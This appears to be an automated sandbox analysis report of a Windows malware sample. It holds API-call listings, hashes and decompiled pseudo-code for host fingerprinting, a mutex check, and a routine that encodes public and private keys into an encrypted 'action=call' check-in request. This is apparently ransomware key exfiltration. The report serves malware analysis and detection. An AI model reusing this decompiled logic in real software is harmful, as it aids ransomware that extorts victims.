lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC710E
lstrcatW.KERNEL32(?,?), ref: 0FBC7114
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC711C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FBC4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC711F

Strings

undefined, xrefs: 0FBC70C1
%x%x, xrefs: 0FBC70B0

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 647427714268c25063c1a6edb99e75e3cc5ce6a6f4574056cf32fba016634049
Instruction ID: 13b0dc8edbd2f34a2050a5a9bd6b65d1ea218a39c7fc89af0956e4901e87376e
Opcode Fuzzy Hash: 647427714268c25063c1a6edb99e75e3cc5ce6a6f4574056cf32fba016634049
Instruction Fuzzy Hash: 7E515F31146658B6DB233F619C49FEF3B1AEFC6701F0200D8FA14240668B699156DFFA

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
stringmemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0FBC39F0: GetProcessHeap.KERNEL32(?,?,0FBC4637,00000000,?,00000000,00000000), ref: 0FBC3A8C

Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
Part of subcall function 0FBC7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
Part of subcall function 0FBC7330: GetComputerNameW.KERNEL32 ref: 0FBC7390
Part of subcall function 0FBC7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
Part of subcall function 0FBC7330: wsprintfW.USER32 ref: 0FBC73F1
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
Part of subcall function 0FBC7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
Part of subcall function 0FBC7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
Part of subcall function 0FBC7330: RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472

Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC465C
lstrcpyW.KERNEL32 ref: 0FBC467F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4686
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC469E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46AA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46CB

Strings

Global\, xrefs: 0FBC4679

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: a2f29ac2965db35b2224ff8d89c5b0f019ad91ca8e0b39c69de8bb4dc89b2278
Instruction ID: c1d82aeb523b13abf7da58bb99bf4cd5d6aabd170bc6fc115b0cb7efd7ad4e0e
Opcode Fuzzy Hash: a2f29ac2965db35b2224ff8d89c5b0f019ad91ca8e0b39c69de8bb4dc89b2278
Instruction Fuzzy Hash: DC212330650315ABE224A725EC5AFBB765CDB40B51F5002BCFA05670C5AED87A058EE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7C10 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC7C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C29
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C3B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C4D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C5F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C71
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C83
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7C95
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7CA7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7CB9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBC46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7CD1

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 28a4d0918f99e6a0de83c3b78d0c3d58e9e5baceb8ae1d5ce61e4044b8447b88
Instruction ID: 86523af84eb945346816e49c51e4ae22d984aa4fc771410c299b0050cece15c0
Opcode Fuzzy Hash: 28a4d0918f99e6a0de83c3b78d0c3d58e9e5baceb8ae1d5ce61e4044b8447b88
Instruction Fuzzy Hash: F321DD30240B05AAE7766A15ED0AFA7B7A1FB40B05F75486CE3C1248F18BF57499DF48

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC72B0 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0fbc72c6
0x0fbc72d0
0x0fbc7324
0x0fbc72d2
0x0fbc72d5
0x0fbc72e7
0x0fbc72ef
0x0fbc7306
0x0fbc730f
0x0fbc731b
0x0fbc72f1
0x0fbc72f4
0x0fbc72f7
0x0fbc7303
0x0fbc7303
0x0fbc72ef

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC72C6
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC72E7
RegCloseKey.KERNELBASE(?,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC72F7
GetLastError.KERNEL32(?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC7306
RegCloseKey.ADVAPI32(?,?,0FBC7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC730F

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: ba44477a77963890287057f136f25e816ce8da7ff14de6058fc59eb92cc35e2f
Instruction ID: 96fb45f7232b76e22f797b477a1ab2c6a43de7373f09cda078c9853f66012361
Opcode Fuzzy Hash: ba44477a77963890287057f136f25e816ce8da7ff14de6058fc59eb92cc35e2f
Instruction Fuzzy Hash: C5017C3260111DFBCB109F95ED09DDBBB6CEB083A2B0040A6FD05D6110D7329A31AFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4BF0 Relevance: 3.0, APIs: 2, Instructions: 25
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;
				_v12 = _a8;
				_t10 = CreateThread(0, 0, E0FBC4950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _v16;
			}

0x0fbc4bf6
0x0fbc4c00
0x0fbc4c1c
0x0fbc4c22
0x0fbc4c29
0x0fbc4c2f
0x0fbc4c2f
0x0fbc4c3b

APIs

CreateThread.KERNELBASE ref: 0FBC4C1C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0FBC4C2F

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNotificationThread
String ID:
API String ID: 4060959955-0
Opcode ID: 07a0111f9cc1a7106def90078d7a7818bed7797395ff3c2b804ae898ddf48f79
Instruction ID: 9894517c40ac347b2dd621b07ba3af0984a6c421eaa1033b6ab56bffefb9d358
Opcode Fuzzy Hash: 07a0111f9cc1a7106def90078d7a7818bed7797395ff3c2b804ae898ddf48f79
Instruction Fuzzy Hash: 20F03934A4430CFBD710DFA0E81AB9EB774EB08B11F20819AEA017B2C0C6B56650CF84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FBC5880 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0FBC5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				signed int _t266;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E0FBC39F0( &_v404);
				E0FBC7330( &_v492, __edx);
				_t255 = E0FBC7140( &_v492);
				_t266 = _a8 + __edx;
				_t7 = _t266 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E0FBC6F40( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.3r");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xfbcfc78]");
					_v448 = _t233;
					_t234 =  *0xfbcfc84; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xfbcfc86; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E0FBC9010( &_v295, 0, 0xff);
					E0FBC5D70( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E0FBC5E20( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E0FBC54A0(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E0FBC7C10( &_v408);
				return _t268;
			}

APIs

Part of subcall function 0FBC39F0: GetProcessHeap.KERNEL32(?,?,0FBC4637,00000000,?,00000000,00000000), ref: 0FBC3A8C

Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
Part of subcall function 0FBC7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
Part of subcall function 0FBC7330: GetComputerNameW.KERNEL32 ref: 0FBC7390
Part of subcall function 0FBC7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
Part of subcall function 0FBC7330: wsprintfW.USER32 ref: 0FBC73F1
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
Part of subcall function 0FBC7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
Part of subcall function 0FBC7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
Part of subcall function 0FBC7330: RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472

Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FBC58F0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FBC599A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FBC59B3
lstrlenA.KERNEL32(00000000), ref: 0FBC59BC
lstrlenA.KERNEL32(?), ref: 0FBC59C4
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0FBC59D5
lstrlenA.KERNEL32(?), ref: 0FBC59EF
lstrlenA.KERNEL32(00000000), ref: 0FBC5A18
lstrlenA.KERNEL32(?), ref: 0FBC5A38
lstrlenA.KERNEL32(?), ref: 0FBC5A64
lstrlenA.KERNEL32(00000000), ref: 0FBC5A75
lstrlenA.KERNEL32(00000000), ref: 0FBC5A97
lstrcatW.KERNEL32(?,action=call&), ref: 0FBC5AB1
lstrlenW.KERNEL32(?), ref: 0FBC5ABA
lstrcatW.KERNEL32(?,&pub_key=), ref: 0FBC5ACF
lstrlenW.KERNEL32(?), ref: 0FBC5AD2
lstrlenA.KERNEL32(00000000), ref: 0FBC5ADB
